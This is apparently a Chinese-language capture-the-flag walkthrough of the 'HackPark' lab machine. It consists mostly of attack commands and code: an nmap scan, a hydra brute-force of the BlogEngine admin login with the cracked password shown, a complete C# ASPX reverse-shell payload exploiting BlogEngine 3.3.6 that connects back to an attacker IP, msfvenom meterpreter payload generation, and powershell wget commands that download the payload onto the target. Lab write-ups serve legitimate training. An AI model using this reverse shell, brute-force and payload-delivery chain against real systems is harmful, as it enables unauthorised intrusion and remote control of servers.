hackpack

信息收集

Google识图：

小丑叫pennywise

┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.0.131
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 22:30 CST
Nmap scan report for 10.10.0.131
Host is up (0.33s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: hackpark | hackpark amusements
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: HACKPARK
|   NetBIOS_Domain_Name: HACKPARK
|   NetBIOS_Computer_Name: HACKPARK
|   DNS_Domain_Name: hackpark
|   DNS_Computer_Name: hackpark
|   Product_Version: 6.3.9600
|_  System_Time: 2022-11-22T14:33:12+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-11-21T14:27:22
|_Not valid after:  2023-05-23T14:27:22
|_ssl-date: 2022-11-22T14:33:20+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.14 seconds
                                                               

attack

爆破神器

hydra -l -P /usr/share/wordlists/ http-post-form

hydra -l admin -P '/usr/share/wordlists/rockyou.txt' 10.10.0.131 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=LCLaTYGEYLxbjKKaZYx%2BT%2FOclzbGSOKTFCYmfNf8P0IanNxJxwDsKqJK5nIwt1TynRTD%2FOdM8FL95vDS9avG20JM7VjaSSLtgglOAo%2FHyuC0UO9A%2FacJfC8D%2BVPuDCWt5YdgmZNX5Ri5bHnHwxoeXxdHmo2gRGkvbji1NcKcoxGcn2LZ&__EVENTVALIDATION=0w0yErw7W2ifmWf6d6SF5Nz4ZJGZtbtXnXAR%2BAcDifJTOH%2FUzj0g1jyDAerDFMn24MNE0G8xIsg1UUXykdI9vFuI2728pS0e71r2xbFtk4sQXKWG9r3l%2Fju9cEXoai%2FXDn8F8b6TQ0emte2GLj16enxLcN%2FdSFKn9qJPNElWM%2BPC2Orn&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95=Log+in:Login failed"

login admin

password 1qaz2wsx

进入后台发现

blogengine 3.3.6 有远程代码执行

原理很简单

应该可以掌握，不多说了

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

    using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.59.85", 4445)) {
        using(System.IO.Stream stream = client.GetStream()) {
            using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                streamWriter = new System.IO.StreamWriter(stream);
                        
                StringBuilder strInput = new StringBuilder();

                System.Diagnostics.Process p = new System.Diagnostics.Process();
                p.StartInfo.FileName = "cmd.exe";
                p.StartInfo.CreateNoWindow = true;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardInput = true;
                p.StartInfo.RedirectStandardError = true;
                p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                p.Start();
                p.BeginOutputReadLine();

                while(true) {
                    strInput.Append(rdr.ReadLine());
                    p.StandardInput.WriteLine(strInput);
                    strInput.Remove(0, strInput.Length);
                }
            }
        }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
       StringBuilder strOutput = new StringBuilder();

           if (!String.IsNullOrEmpty(outLine.Data)) {
               try {
                    strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.0.91 LPOST= 9898 -e x86/shika_ga_nai -f exe -o 1.exe

http服务

python3 -m http.server 8880

powershell -c wget “http://ip/1.exe”

GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.0.91 LPORT=900 -f exe -o openme.exe
powershell -c wget "http://10.17.0.91:9988/openme.exe" -outfile "11.exe"

https://github.com/PowerShellMafia/PowerSploit

这个自己了解，困得不行了，xdm 安安 =-=

PEASS-ng/winPEAS/winPEASbat at master · carlospolop/PEASS-ng · GitHub